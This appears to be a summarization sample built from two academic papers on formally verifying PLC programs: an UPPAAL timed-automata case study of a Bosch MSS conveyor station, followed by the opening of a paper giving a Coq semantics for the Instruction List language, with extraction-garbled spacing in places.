Presentation. Platform MSS (from Bosch Group) provides a function for sorting a stock of pinions of different materials and for adding or withdrawing a press-fit bushing to a given pinion [14]. Our study is centered on station 2 (figure 3), which is intended to identify the material of the pinion (steel, copper or black PVC) and the presence or absence of a press-fit bushing. The workpieces are transported by a linear conveyor to a scanning position, where the presence or absence of a press-fit bushing is detected. They are then tested by three sensors to determine their material. This is done using inductive, capacitive and optical sensors. The detected information is forwarded to the next stations. A rotary/lift gripper performs the transfer to a follow-on station if applicable.

Issue detected. A problem arises when the conveyor arrives at the bearing test position (POS_TEST sensor). At this time the conveyor moves at high speed (200 mm/s)
and the variation of the reaction time of the control system, above 10 ms, is not negligible. Indeed the conveyor position should have a precision of 1 mm for the tester (or jack) to be able to penetrate inside the pinion, in case the bearing is absent. So, we can deduce that the variation of the reaction time of the control system must be less than 5 ms. In the rest of the paper, we study the case of a multitask controller, with an event-driven task, launched on the rising edge of the test position (POS_TEST) sensor, which stops the conveyor if it comes from the loading station.

Properties to check. The multitask control program of this station must satisfy the following properties:

P1 To ensure safety, the conveyor must stop on its way out but not when it comes back from unloading.
P2 The time performance is accurate: the conveyor stops in less than 5 ms at the press-fit bushing test point.

In this work, we focus on the timed property P2, to show that the multitask solution reduces the reaction time.

4 Modeling principles

In this section, we briefly recall the timed automaton based semantics proposed by Mader and Wupper [12] for a control program. Then we explain the structure of our model for (station 2 of) the MSS platform, with a particular attention to the question of timers.

4.1 Mader-Wupper model

Various models have already been proposed for the analysis of PLC programs. Our approach is based on the model introduced by Mader and Wupper [12], which disregards the execution times of elementary instructions.

[Figure 4. Mader-Wupper model: a cyclic automaton whose locations carry the invariant x ≤ δ2 and whose last edge carries the guard x > δ1.]

As depicted in figure 4, the model has a clock x to measure the cycle scan, which is thus reset after each cycle of the program. The invariant x ≤ δ2 is associated with each location and represents an upper time bound for each whole scan. The guard x > δ1 appears on the last edge of the cycle and represents a lower time bound for the input/output part of the cycle. An edge in the model describes a step of the control program. Mader-Wupper also models each timer block as a timed automaton that runs in parallel with the control program. Synchronization is performed through operations on the timer variables and on the timer calls, which requires one extra clock and three synchronization channels for each timer.
4.2 An overview of the model

Our model is built in a compositional way from a collection of nondeterministic processes with finite control structure and real-valued clocks, communicating through channels or shared variables. The two main parts are the environment and the control program, which communicate through shared variables and synchronization messages. The modeling of the operative part (environment) is necessary for the verification of the safety and performance properties stated previously. The details are explained in Section 5.

4.3 Modeling timers

Six independent timers (TON function block in IEC 61131-3 [10]) are used in the station 2 control program. We now explain how our model of a TON function block differs from that of Mader-Wupper [12] and how we used broadcast channels in UPPAAL to avoid deadlocks. Each TON block is modeled by an automaton, described in figure 5, with three states, one clock x_Ton and two discrete variables Ton_ine (input) and Ton_Qe (output). Initially idle, the state becomes running when the timer has been switched on, and Timeout when some fixed preset delay (constant Ton_pte) has been reached. At each cycle of the main task, a synchronization message is sent. The automaton is then forced to evolve by taking into account the new values of the variables computed by the previous cycle. A deadlock could occur if the automaton is in a state where it cannot receive the synchronization message of the program. So we chose a single broadcast channel (with emission TON! and reception TON?) for all TON blocks instead of three ordinary channels per TON in Mader-Wupper's model.

[Figure 5. UPPAAL model of a TON block: locations idle, running (invariant x_Ton <= Ton_pte) and Timeout; edges synchronized on TON?, guarded by Ton_ine and (x_Ton == Ton_pte) && Ton_ine == 1, updating Ton_Qe and resetting x_Ton.]
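Under the assumptions of this section, the three-state TON automaton of figure 5 behaves roughly as follows (a Python sketch, not the UPPAAL model itself; the per-cycle broadcast TON? is modeled as a call to step(), and clock progress as a call to elapse()):

```python
class TonBlock:
    """Sketch of the TON automaton of figure 5: idle / running / Timeout.
    The broadcast TON! received each cycle is modeled by calling step()."""

    def __init__(self, preset):
        self.state = "idle"
        self.x_ton = 0        # clock x_Ton, advanced by the caller
        self.pt = preset      # Ton_pte: preset delay
        self.q = 0            # Ton_Qe: boolean output

    def step(self, ton_in):
        # ton_in plays the role of Ton_ine, computed by the previous cycle.
        if self.state == "idle":
            if ton_in:
                self.state, self.x_ton, self.q = "running", 0, 0
        elif self.state == "running":
            if not ton_in:
                self.state, self.q = "idle", 0
            elif self.x_ton >= self.pt:   # preset delay reached
                self.state, self.q = "Timeout", 1
        elif self.state == "Timeout":
            if not ton_in:
                self.state, self.q = "idle", 0

    def elapse(self, d):
        self.x_ton += d

t = TonBlock(preset=30)
t.step(1)            # timer switched on: idle -> running, clock reset
t.elapse(30)         # time passes between cycles
t.step(1)            # preset reached: running -> Timeout, output set
print(t.state, t.q)  # Timeout 1
```

The single step() entry point mirrors the single broadcast channel: the automaton can always react to the per-cycle message, whatever its current state, which is exactly what avoids the deadlock mentioned above.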
5 Modeling with UPPAAL

5.1 Modeling the environment

Interest. In order to validate not only the PLC program but also its integration in the system it has to control, we also need to model the operative part. This implies a thorough knowledge of the system to control, particularly the behavior of each element and its reaction time. Modeling the environment makes it possible to speed up the verification time, in particular by reducing the combinatorial aspects related to the nondeterministic definition of all possible input values, including sometimes non relevant ones. Indeed, when the input values of the PLC program are emitted by a model instead of a nondeterministic process, the space of reachable states is reduced. However, these parts of the model are usually limited to the representation of nominal operation modes, which is the case here.

Modeling. Each physical device is represented by a timed automaton. In such an automaton, a given location represents a particular configuration of the device. In the models proposed here, clocks are the only continuous components, while physical continuous moves are discretized (for instance for the conveyor).

The external environment. In station 2, the leftmost position corresponds to the loading of pinions, while the rightmost position is used for unloading. However, the control of loading and unloading operations is not part of this station, which just waits for them to be done. Information about termination of one of these operations is obtained through changes of input values. Upon loading, the conveyor is provided an unspecified pinion. This is modelled by an automaton, presented in figure 6, which selects in a nondeterministic way the nature of the pinion (variable ob) when the conveyor is at the rightmost position.

[Figure 6. Model of the environment external to station 2: when left_pos == 1, the automaton nondeterministically sets ob to a value in 0..6, with DCY := 1 and evac_pinion := 0.]

The jack. The jack detects the presence or absence of a press-fit bushing in a workpiece.
This test is made by a vertical movement of the jack until a limiting position. The jack must go down until the limiting position is reached, in a given time, to conclude to the absence of the press-fit bushing. The model of this sensor (figure 7) depends on the characteristics of the workpieces, which are represented by the values of the variable ob. The automaton starts from the state top. It moves to state go_down when it receives a message down_jack? from the PLC program. From this point on, there are two cases: if there is a press-fit bushing in the workpiece (represented in the model by the guard ob==1 || ob==3 || ob==5) then the automaton waits in the state go_down, else the automaton moves to state limiting_position.

[Figure 7. Timed automaton for the jack: locations top, go_down and limiting_position; edges synchronized on down_jack? and up_jack?, with guards on ob and pos_test, updating jack_down.]

The sensors. The optical, capacitive and inductive sensors are modeled by automata synchronized with the automaton of the conveyor. The conveyor sends the activation messages (for example optics? in figure 8) when it is under the corresponding sensor. According to the nature of the material, the sensor modifies the value of the corresponding variable (optical) which is then used by the PLC program.

[Figure 8. Timed automaton for the optical sensor: from idle, on optics? the variable optical is set to 1 if ob is in {1, 2, 3, 4} (and stays 0 if ob is in {0, 5, 6}); the clock x_co is reset, and optical is cleared when x_co == 400.]
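As a rough Python sketch of the optical sensor automaton of figure 8 (the synchronization message optics? is modeled as a method call, and the 400 time-unit reset and the set of ob values follow the figure as reconstructed above):

```python
class OpticalSensor:
    """Sketch of the optical-sensor automaton: on optics? it sets the
    shared variable `optical` according to the pinion nature `ob`,
    and clears it after 400 time units."""

    def __init__(self):
        self.optical = 0
        self.x_co = None          # clock x_co; None while idle

    def optics(self, ob):         # receive optics? from the conveyor
        self.optical = 1 if ob in (1, 2, 3, 4) else 0
        self.x_co = 0

    def elapse(self, d):
        if self.x_co is not None:
            self.x_co += d
            if self.x_co >= 400:  # figure 8: optical := 0 when x_co == 400
                self.optical, self.x_co = 0, None

s = OpticalSensor()
s.optics(ob=2)
seen = s.optical     # value read by the PLC program during this window
s.elapse(400)
print(seen, s.optical)  # 1 0
```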
The linear conveyor. The conveyor is the main element of the operative part: several triggerings of sensors depend on its position. The conveyor is also the most delicate to model because of its continuous behavior along the belt, while our model can only provide a discrete abstraction of this behavior, leaving out the details which do not influence the properties to be checked. In order to obtain reasonable performances in terms of memory and automatic verification time, we model only the almost stable positions, i.e. the positions where the conveyor can stop, or trigger a sensor. These positions correspond to the six states: inductive_sensor, capacitive_sensor, optical_sensor, test, left, right. Between two given positions, we model the behavior of the conveyor by only one state with an invariant which represents the time needed by the conveyor to cross the distance between these two positions. For example, the conveyor goes from the left position to the capacitive_sensor position in 490 to 500 ms. There is another abstraction imposed by the fact that no stopwatch exists in UPPAAL: between two almost stable positions, the conveyor cannot change direction. The conveyor sends messages of synchronization to the various sensors (like optics!) and the event-driven task (postest!) at the time of its arrival to the test position. It also modifies the input variables of the control program. The corresponding automaton is represented in figure 9.

[Figure 9. Timed automaton for the conveyor.]
5.2 The control program

The main program. The functional specification of the global system is designed in the GRAFCET (or SFC) language, and further implemented in the Ladder language. As explained above, the execution of a PLC program is a cycle with three phases: input reading, computation of new values and output writing. This periodic operation is modeled in UPPAAL by an automaton structured as a loop, and including a clock to measure the cycle time (equal to 10 u.t. here). The complete cycle of the automaton for the ladder program thus consists of a loop with four steps:

1. input reading and computation of new values for the evolution conditions of the GRAFCET,
2. computation of other new values for GRAFCET variables: step activation and output computation,
3. output writing, performed by a sequence of messages for synchronization with the operative part,
4. reset of the clock modeling the cycle time.

The atomicity hypothesis is the following: time can elapse only in the three states between these steps, to represent the duration of their execution.

The event-driven program. Since it is run upon activation of the bushing-test position, the event-driven task is strongly dependent on the environment. This aspect is modeled by the emission of a message from the environment, received by the automaton of the event-driven task (figure 11).

[Figure 11. UPPAAL model and Ladder Diagram for the event-driven task.]

When the message postest! is emitted, the automaton executes the algebraic equations which represent the Ladder program and sends the output message stop! if the condition holds. Note that the execution time of the event-driven task is null due to the committed location used to model the priority of the event-driven task. Various programming designs are considered in order to determine the conditions under which the requirements are satisfied:

* the event-driven task emits its own output,
* the event-driven task only modifies the internal memory of the output,
* the event-driven task is not activated.

[Figure 10. UPPAAL model of the main program: input reading (invariant x_cycle <= 10), computation of the GRAFCET evolution conditions (CFT0..CFT18) and step variables (x0..x13), synchronization of the TON blocks on TON!, then output emission towards the operative part (messages such as down_jack!, go_left!, go_right!), with the clock x_cycle reset at each cycle.]

6 Verification with UPPAAL

The observer automaton.
In order to verify the timed property P2, we need an additional automaton (see below), which plays the role of an external observer with respect to the model previously described.

[Observer automaton: locations idle, obs and stop; the clock X is reset on the edge from idle to obs, which is synchronized on postest?, and the edge from obs to stop is synchronized on stop?.]

This automaton contains a state stop, reached when the conveyor stops in testing position. It also contains a clock X to measure the reaction time. The observer automaton starts from state idle with X set to 0. When the message postest? is received from the conveyor, the automaton moves to state obs and resets the clock X. From this point on, the clock value again increases with time. When the message stop? is received from the main program, the automaton switches to state stop. Thus, the value of X in this last state corresponds to the time elapsed between the triggering of the event-driven task and the physical stop of the conveyor. To check the timed property P2, we express its negation (C1 in the table below): the observer automaton will eventually reach the state stop with the value of the clock X greater than 5 time units. This property is written as

E<> (obs.stop and X > 5)

in UPPAAL syntax, which is a fragment of the logic TCTL [1]. In this formula, the combination E<> means "for some path in the future" and obs.stop denotes location stop of the observer automaton.

Experiments. First note that the global model has about 30·10^6 configurations, which are explored in an on-the-fly computation of the set of reachable states. The table below gives the time and memory used for verification (on a Linux machine with a Pentium 4 at 2.4 GHz with 3 GB RAM). The results provide a comparison of the reaction times between monotask and multitask programming. Indeed, on the one hand, properties C5, C6 and C7 show that the conveyor stops between 10 and 20 time units after it reaches the test position. This is far from being a surprise because these values correspond respectively to one and two PLC cycle times. On the other hand, property C3 shows that the conveyor stops in less than one PLC cycle time. So, multitask programming reduces the reaction time. However, property C1 proves that it is not sufficient to satisfy the requirement P2.

Note that, after 29 hours of computation, we stopped the verification process in the case of the Mader-Wupper model.
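The observer's bookkeeping can be sketched in Python (the event timestamps below are invented for illustration; the query itself is of course checked by the model checker, not by such code):

```python
# Sketch of the observer automaton: it timestamps the postest event and
# the stop event; their difference is the reaction time X inspected by
# the query E<> (obs.stop and X > 5).

class Observer:
    def __init__(self):
        self.state = "idle"
        self.reset_at = None

    def on_postest(self, now):
        if self.state == "idle":
            self.state, self.reset_at = "obs", now   # clock X := 0

    def on_stop(self, now):
        if self.state == "obs":
            self.state = "stop"
            return now - self.reset_at               # value of X in state stop
        return None

obs = Observer()
obs.on_postest(now=100)          # conveyor reaches the test position
reaction = obs.on_stop(now=112)  # main program stops the conveyor
print(obs.state, reaction)       # stop 12
```

With these invented timestamps the reaction time is 12 time units, i.e. within the one-to-two-cycle range observed for monotask programming, and a witness that X > 5 (property P2 violated).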
These performances are due to two main reasons: the atomicity hypothesis for executions between some states of the main program and the enhanced model of the TON block.

* The atomicity hypothesis: we assume that each one of the four steps of the main program (section 5.2) executes instantaneously. Recall that time can elapse only in three states.
* The enhanced model of the TON block: we use one broadcast channel to synchronize all the TON blocks and the main program instead of three ordinary channels for each TON block as in the Mader-Wupper model.

7 Conclusion

In this work, we give formal semantics to (partial) Ladder diagrams and TON blocks, with timed automata. We also describe the operative part of station 2 of the MSS platform with timed automata. On this network of timed automata represented in UPPAAL syntax, we formally prove by model-checking that multitask programming reduces the reaction time of the conveyor, upon emission of an output order to stop. While this does not really come as a surprise, we obtain reasonable verification times (less than 30 s) on a global model with about 30·10^6 states, by adding an atomicity hypothesis to the Mader-Wupper model and modifying the automata for timer blocks. In comparison, model-checking the same formula with the original model had to be stopped after several hours.
Summary:
Since it is an important issue for users and system designers, verification of PLC programs has already been studied in various contexts, mostly for untimed programs. More recently, timed features were introduced and modeled with timed automata. In this case study, we consider a part of the so-called MSS (Mecatronic Standard System) platform from the Bosch Group, a framework where time aspects are combined with multitask programming. Our model for station 2 of the MSS platform is a network of timed automata, including automata for the operative part and for the control program, written in Ladder Diagram. This model is constrained with atomicity hypotheses concerning program execution, and model checking of a reaction time property is performed with the tool UPPAAL.
|
Summarize:
I. Introduction

Programmable Logic Controllers (PLC) are microprocessor based control systems. They are used in a wide range of industrial applications, from the automotive industry and chemical plants to home appliances. PLC applications are critical in a safety or economical cost sense. The recent events of the recall of a large amount of cars for some safety problems caused by a programming bug are just a new example of how the cost of such errors can easily get out of proportion. This is even more relevant for PLC programs because they are generally used to perform repetitive actions. Thus the use of formal methods, and especially theorem proving, in the PLC programs development process will increase the confidence in such programs.

Instruction List (IL) is one of the five programming languages defined in the IEC 61131-3 standard [1]. With the graphical language Ladder Diagrams (LD), they are the most widely used languages for programming PLC. The definition of a formal semantics of IL is a prerequisite for the development of a generic tool for verifying PLC programs written in IL. Since most PLC compilers use IL as an intermediate language in the compilation process to machine code, a formal semantics of IL is also necessary for the development of a certified compiler for PLC. This work is the first step towards the development of a certified compiler for PLC programs. It also provides a basis for the development of a static analyzer for PLC programs. (This research work is funded by the ANR grant ANR-08-BLAN-0326-01 for the SIVES project.)

There are many examples of the use of formal methods for the verification of PLC programs [2], [3], [4]. Most of these examples use model checking. In some of these works, an operational semantics of PLC programs is defined. We extend the operational semantics defined in [5] to support a larger subset of IL instructions (timers, ...) and the cyclic behavior of PLC programs.
We formalized this semantics in the proof assistant Coq [6] using its extension SSReflect [7]. In this paper, we give in the first section a brief presentation of PLC systems. In the second section we present a small step operational semantics of the IL language. The formalization of this semantics in the proof assistant Coq and an example are described in the third section. Related works and conclusions are presented in the two final sections.

II. Programmable Logic Controller

A PLC is composed of a microprocessor, a memory, and input and output devices where signals can be received from sensors or switches and sent to actuators. A main characteristic of PLCs is their execution mode. A PLC program is executed in a permanent loop. In each iteration of the execution loop, or scan cycle, the inputs are read, the program instructions are executed and the outputs are updated. Figure 1 shows the sequencing of the 3 phases of the scan cycle. The cycle time is often fixed or has an upper bound limit. It depends on the manufacturer and type of the PLC.

2011 35th IEEE Annual Computer Software and Applications Conference, 0730-3157/11 $26.00 © 2011 IEEE, DOI 10.1109/COMPSAC.2011.23

[Figure 1. Schema of PLC scan cycle: inputs scan, then instructions execution, then outputs scan.]

A. Programming languages

Since the introduction of PLCs in the industry, each manufacturer has developed its own PLC programming languages. In 1993, the International Electrotechnical Committee (IEC) published the IEC 1131 International Standard for PLC.
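The scan cycle of Figure 1, described above, can be sketched as a loop (a minimal Python illustration; the read/write callbacks and the button/motor process are hypothetical):

```python
def scan_cycle(read_inputs, program, write_outputs, cycles):
    """Sketch of the PLC execution mode: each iteration reads the inputs,
    executes the program, then updates the outputs."""
    state = {}
    for _ in range(cycles):
        state.update(read_inputs())   # 1. inputs scan
        program(state)                # 2. instructions execution
        write_outputs(state)          # 3. outputs scan

# Hypothetical process: a button input directly drives a motor output.
inputs = iter([{"button": 0}, {"button": 1}, {"button": 1}])
log = []
scan_cycle(read_inputs=lambda: next(inputs),
           program=lambda s: s.update(motor=s["button"]),
           write_outputs=lambda s: log.append(s["motor"]),
           cycles=3)
print(log)  # [0, 1, 1]
```

The key point mirrored here is that inputs are sampled only once per cycle: an input change is visible to the program, and to the outputs, no earlier than the next iteration.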
The third volume of this standard defines the programming languages for PLC. It defines 4 languages:

* Ladder Diagrams (LD): a graphical language that represents PLC programs as relay logic diagrams.
* Function Block Diagrams (FBD): a graphical language that represents PLC programs as connections of different function blocks.
* Instruction List (IL): an assembly-like language.
* Structured Text (ST): a textual (PASCAL-like) programming language.

The standard also defines a meta language called Sequential Function Charts (SFC). It corresponds to a graphical method for structuring programs and allows to describe the system as a state transition diagram. Each state is associated to some actions. An action is described using one of the PLC programming languages like LD or IL. SFC are well suited to write concurrent control programs. We present later in more details the IL language, the main focus of this work.

B. Timers

In the context of PLC applications, there is often the need to control time. For example, a motor might need to be activated or switched off for a particular time interval. As another example, in a chemical plant a valve is open and a tank will be full after a period of time. PLC timers are components that set on a boolean output after or for a period of time following the activation of a boolean input. They are used to control output signal duration or as input signals for time-dependent PLC programs. In general, they have two inputs and two outputs.

[Figure 2. Standard timer representation: a block Txx with inputs IN (BOOL) and PT (TIME), and outputs Q (BOOL) and ET (TIME).]

Figure 2 shows the IEC 61131-3 standard graphical representation of timers. In this representation, IN and Q are respectively the boolean input and output of the timer. PT is the constant input used to specify the time delay of the timer. ET is the output indicating the elapsed time since the activation of the timer. The delay PT and elapsed time ET are multiples of a system predefined time base.

[Figure 3 shows the timing diagrams of IN and Q for the three kinds of timers: (a) on-delay timer, (b) off-delay timer, (c) pulse timer.]
There are three basic types of timers that can be found with PLCs. The IEC 61131-3 standard defines:

* on-delay timers (TON): they come on after a time delay following the activation of the input (Figure 3(a)).
* off-delay timers (TOF): they stay on for a fixed period of time after the input goes off (Figure 3(b)).
* pulse timers (TP): they turn on for a fixed period of time after the input goes on (Figure 3(c)).

III. Instruction List language

A. General structure

The IEC 61131-3 standard defines an Instruction List program as a list of variable (input, output and local) declarations followed by a list of instructions. An instruction contains an operator followed by a list of operands. Most IL instructions take one operand, but some, like timer instructions, need more than one operand. A label followed by a colon (:) can be inserted before an instruction. An example of an IL program is the following:

LABEL  OPERATOR  OPERAND
l1:    LD        x
       ADD       3
       JMP       l1

The meaning of some IL operators can be changed using modifiers. In particular, the standard defines two modifiers: C and N. The C modifier indicates that the corresponding instruction should be executed only if the current evaluated result is the boolean value true. It can be used with branching instructions or function calls. The N modifier indicates that the operand of the corresponding instruction should be negated. If it is combined with the C modifier, it means that the corresponding instruction should be executed only if the current evaluated result is the boolean value false. It can be used with branching instructions, function calls or boolean operators. For example, the instruction JMPCN l1 will be executed only if the current evaluation is false.

B.
Model choices

The IEC 61131-3 standard was published after many PLC manufacturers had defined and implemented their own programming languages. It does not give a clear description of the semantics of PLC languages. It does not specify either how PLC timers should behave. We saw previously that a PLC timer has two outputs: the boolean output and the output giving the elapsed time since the timer activation. How these outputs are updated is not described by the standard. In practice, PLC manufacturers define two types of timers according to the way their outputs are updated. In the first category, outputs can be updated only if the timer instruction is executed. For this kind of timers, a time error is introduced depending on the timer delay variable and the program cycle duration. In the second category, timer outputs are automatically updated by a system routine. In this case a time error is introduced depending on the position of the timer instruction in the program. The execution of the timer instruction is only required to check the state of the outputs. Both timers are not ideal timers, and the time error should be taken into account by the PLC programmer when defining the timers delay input.

Our IL model is a significant subset of the language defined by the IEC 61131-3 standard. This subset covers assignment instructions and boolean and integer operations. It also covers comparison and branching instructions and on-delay timers. We choose to consider only booleans and integers as basic data types. In most PLC systems, reals are available as basic data types. But in practice, computations on real numbers cost much time and they are often delegated to a PC that can communicate with the PLC. This is motivated by the need to keep the program scan cycle within a relatively small time upper bound. In this work we will consider only TON timers. The other two kinds of timers can be treated similarly.
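To illustrate the timing diagrams of Figure 3 over a discrete time base, the TON and TP behaviors can be sketched as pure functions of the input history (a simplified Python sketch, not the exact IEC semantics; TOF can be written along the same lines):

```python
def ton(inputs, pt):
    """On-delay: Q comes on once the input has been on for more than pt steps."""
    q, on_for = [], 0
    for x in inputs:
        on_for = on_for + 1 if x else 0   # elapsed time while input is on
        q.append(1 if on_for > pt else 0)
    return q

def tp(inputs, pt):
    """Pulse: Q stays on for pt steps after a rising edge of the input."""
    q, left, prev = [], 0, 0
    for x in inputs:
        if x and not prev and left == 0:  # rising edge starts the pulse
            left = pt
        q.append(1 if left > 0 else 0)
        left = max(0, left - 1)
        prev = x
    return q

sig = [0, 1, 1, 1, 1, 0, 0, 0]
print(ton(sig, pt=2))  # [0, 0, 0, 1, 1, 0, 0, 0]
print(tp(sig, pt=2))   # [0, 1, 1, 0, 0, 0, 0, 0]
```

The sketch makes the difference visible on the same input: TON delays the rising edge of Q, while TP produces a fixed-length pulse from the rising edge of IN.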
We will also suppose that the outputs of the timers are updated only when the timer instruction is executed. This is the case for most of the timers provided by PLC manufacturers. We will also suppose that in an IL program, a timer instruction is called only once with the same output variable. This is needed to keep the time error for the timer less than a cycle duration.

The IL subset we work with does not include function calls or counter instructions. In our model, we also choose to work with simple IL operators. In particular, the IL language supports binary operators that use a stack for the operation execution. The IL subset we deal with does not include these operators. An extension of our semantics to support these operators and the function call should not be difficult.

C. Syntax

Each IL program starts with variable declarations. We will denote the type of IL variables by Var. These declarations specify for each variable if it is
Instructions: i::= LDop load |STid store |SRid|RSid set and reset |JMPlbl|JMPClbljumps |JMPCN lbl |ADDop|SUBop integers |MULop |ANDop|ORop booleans |ANDN op|ORNop |NOTop |EQop|GEop comparison |GTop |TONid , n On delay timer |RET end of program Operands: op::=id|cstvariable identi er or constant Constants: cst::=n|binteger or boolean literal We will denote the set of IL instructions by Instr. For simplicity, we suppose that IL program labels are natural numbers. Since an IL program is a list of instruction, a label will indicate the position of thecorrespondinginstructioninthelist.Foragiven program Pand an index i,P(i) Instrrepresent the instruction of Pat the position i. D. Operational semantics We de ned a small step operational semantics of IL programs. This semantics extend the one de ned in [5] to support on-delay timers and the cyclic behavior of PLC programs.Modes:as we mentioned in Section II, each IL program scan cycle contains 3 phases: I: input, O: output, E: instruction execution. The set of these execution phases will be denoted modes. Cycles: we suppose having a global discrete time clock. Each program execution cycle is rep- resented by an identi er or its index in the time execution line. Every cycle is associated to its beginning time according to the global clock. The set of program execution cycles is denoted C N. For a cycle c, the starting time is denoted tcand t h ed u r a t i o no fe v e r yc y c l ei s x e da n dc o r r e s p o n d to a global system constant =tc+1 tc. States:a state is a function that associates to each variable of the program and the register a value. The set of state corresponds to: S={reg} Var D, whereDis the union of the IL variables data domains. Con gurations: elements of the set E=C S N mode. A con guration (c, ,i,m)corresponds to a cycle identi er c, a state , a position index i and an execution mode m. Transitions: relationoncon gurations E E. 
F i g u r e4g i v e st h ei n f e r e n c er u l e so ft h eI Lc o n g u - rations transitions relation. The transition system is de ned by an initial con guration (0, 0,0,I), where 0istheinitialstatethatmapsallthein teger variables to 0and boolean variables to false. The rst two transitions rules of Figure 4 cor- respond to the loadandstoreinstructions. In the rst case the register is updated while in the second the variable state is updated. The transitions cor- responding to the set/reset instructions (rules SR andRS) update the variable state function with the corresponding values for the given operands. In the inference rule JMP, transition for the uncondi- tional branching instruction, there is no condition on the branching label value (position of the jump- ing target) compared to the current position of the program counter. This can lead to non terminating ILprograms.Inpracticethisshouldnotbethecase, since every IL program should terminate during the 129 130 121 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. 
[Figure 4. IL operational semantics: inference rules for LD, ST, SR, RS, the jumps JMP, JMPC and JMPCN, the arithmetic, logical and comparison instructions (ADD, SUB, MUL, AND, OR, ANDN, ORN, NOT, EQ, GE, GT), the timer rules TON-off, TON-on and TON-end, RET, and the Input and Output transitions.]

scan cycle time limit. We chose here not to consider this kind of error; it can be treated at the level of syntactic analysis or by static analysis of the program. The transition relation for the TON instruction is given by the rules TON-off, TON-on and TON-end of Figure 4. The elapsed time variable ET of the TON timer is incremented by the global constant delta when the timer is activated (the evaluation register value is true). The timer output Q is activated when the elapsed time variable ET is greater than or equal to the timer delay parameter PT. For the Input transition, the variables state function is updated with the input variable values given by the program's global environment. The Output transition corresponds to the incrementation of the cycle identifier and the change of the configuration mode. The program environment has to read the variables state during this transition to get the values of the outputs of the system. After this definition of the semantics of the IL language, we present in the next section our formalization of this semantics in the proof assistant Coq.

IV. Coq formalizations

As we mentioned before, we intend to develop a certified compiler from IL to the C language. We chose to formalize the IL semantics in the Coq proof assistant to make it easier to connect our development to the already existing certified compiler for C: the CompCert [8] compiler. We also want to produce a certified executable from this formal development; the Coq extraction mechanism will allow us to produce such an executable. 130 131 122 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply.
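For illustration only, the three TON rules above can be mimicked in a few lines of Python. This is an assumption of this rewrite, not part of the paper's Coq development; the names `ton_step`, `reg`, `et`, `pt` and `delta` are made up.

```python
# Illustrative sketch (not the paper's code) of the TON rules of Figure 4.
# `delta` plays the role of the global cycle-duration constant.
def ton_step(reg, et, pt, delta):
    """Return (Q, ET) after one evaluation of a TON timer with preset pt.

    TON-off: input false            -> Q = False, ET reset to 0
    TON-on:  input true, ET < PT    -> Q = False, ET advances by delta
    TON-end: input true, ET >= PT   -> Q = True,  ET advances by delta
    """
    if not reg:                  # TON-off
        return False, 0
    if et < pt:                  # TON-on
        return False, et + delta
    return True, et + delta      # TON-end
```

Note that, as in the rules, the output Q only turns on once the accumulated ET has reached the preset PT while the input stays true.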
In reasoning about IL programs, we will have to deal with properties of booleans and natural numbers. In this development, we chose to use the Coq extension SSReflect for its rich libraries on booleans and natural numbers. We also use the SSReflect generic library for lists and its interface for types with decidable equality. More details about these libraries can be found in the SSReflect manual [7] and tutorial [9].

A. Syntax

The Coq system provides a very powerful mechanism to define recursive or finite types or sets. This mechanism, called inductive types, is very useful when defining the syntax of a programming language. We define the IL syntax presented in Section III-C using the Coq inductive type mechanism. The definitions are given in Figure 5. In these definitions, the types time and ident are renamings of the Coq standard type nat: ident is the type of variable identifiers and, since we consider discrete time, time is the type of time values. A piece of IL code corresponds to a list of instructions; we represent it as an element of the type code := seq Instr (seq is the type of lists in SSReflect).

Inductive ILcst : Type :=
| Ncst (n : nat) | Bcst (b : bool) | Tcst (t : time).

Inductive Operands : Type :=
| var (id : ident) | cst (c : ILcst).

Inductive Instr : Type :=
| LD (op : Operands) | ST (x : ident) | SR (x : ident) | RS (x : ident)
| JMP (l : nat) | JMPC (l : nat) | JMPCN (l : nat)
| ADD (op : Operands) | SUB (op : Operands) | MUL (op : Operands)
| AND (op : Operands) | OR (op : Operands) | ANDN (op : Operands)
| ORN (op : Operands) | NOT (op : Operands)
| EQ (op : Operands) | GT (op : Operands) | GE (op : Operands)
| TON (q et : ident) (pt : time) | RET.

Figure 5. Coq definition of the IL syntax

B. Semantics

Our formalization of the IL semantics defined in Section III-D is parameterized by the following Coq global variables:

Variables (delta : time) (pi : seq ident).
Variables (p_ival : nat -> ident -> nat) (P : code).
The variable delta represents the cycle duration time. The list of program input variables is represented by pi. In order to define the semantics transitions, we need to know the input variables so as to update them with the values given by the program environment at the beginning of each cycle. Those values are represented by the function p_ival, which takes as parameters a cycle identifier and a variable identifier and returns a value. When we look at the definition of the transition relation for the IL semantics given in Figure 4, we notice that it can be decomposed into two sub-operations. First, there is the state updating function, which returns a new state according to the evaluated program instruction. Second, there is the program location successor, which normally returns the incremented value of the current location, unless the instruction is a branching one. The configuration transition function can be defined on top of these sub-operations just by checking the execution mode.

States: For the definition of the variable states, and since booleans can be injected into integers2, we choose to represent the natural numbers as the data domain of the IL variables. We define a state as an object of the type State.

Definition State := nat * (ident -> nat).

Definition state_up s i v : State :=
  if i is (S n) then (s.1, fun x => if n == x then v else s.2 x)
  else (v, s.2).

A program state s : State is a pair. The first element of the pair, denoted s.1, represents the value of the current register. The second element, denoted s.2, represents the function that maps every program variable to its value. We also define some state transformation functions. The function state_up updates the value of a state s for a given variable determined by its second argument i with a value v. If i is equal to zero, the current register value is updated; otherwise the variables mapping function is updated.
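As an informal, hypothetical analogue of the State pair and of the state_up convention (not the paper's code), the variables mapping function can be stood in for by a dictionary:

```python
# Illustrative Python sketch (assumed names): a state is a pair
# (register, variable map); index 0 targets the register and index
# n + 1 targets variable n, mirroring state_up's convention.
def state_up(state, i, v):
    reg, env = state
    if i == 0:                # update the current register
        return (v, env)
    new_env = dict(env)       # update the variables mapping
    new_env[i - 1] = v
    return (reg, new_env)
```

Used on a state `(0, {0: 7})`, updating index 0 changes only the register, while updating index 1 changes variable 0.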
Instruction evaluation: The definition of the IL instruction evaluation function is presented in Figure 6.

2 This can be automatically done in Coq using coercions.

Definition eval_instr (s : State) (i : Instr) : State :=
  match i with
  | LD op => state_up s 0 (s op)
  | ST x => state_up s x.+1 s.1
  | SR x => state_up s x.+1 (BofN s.1 || BofN (s.2 x))
  | RS x => state_up s x.+1 (~~ BofN s.1 && BofN (s.2 x))
  | AND op => state_up s 0 (BofN s.1 && BofN (s op))
  | OR op => state_up s 0 (BofN s.1 || BofN (s op))
  | NOT op => state_up s 0 (~~ BofN (s op))
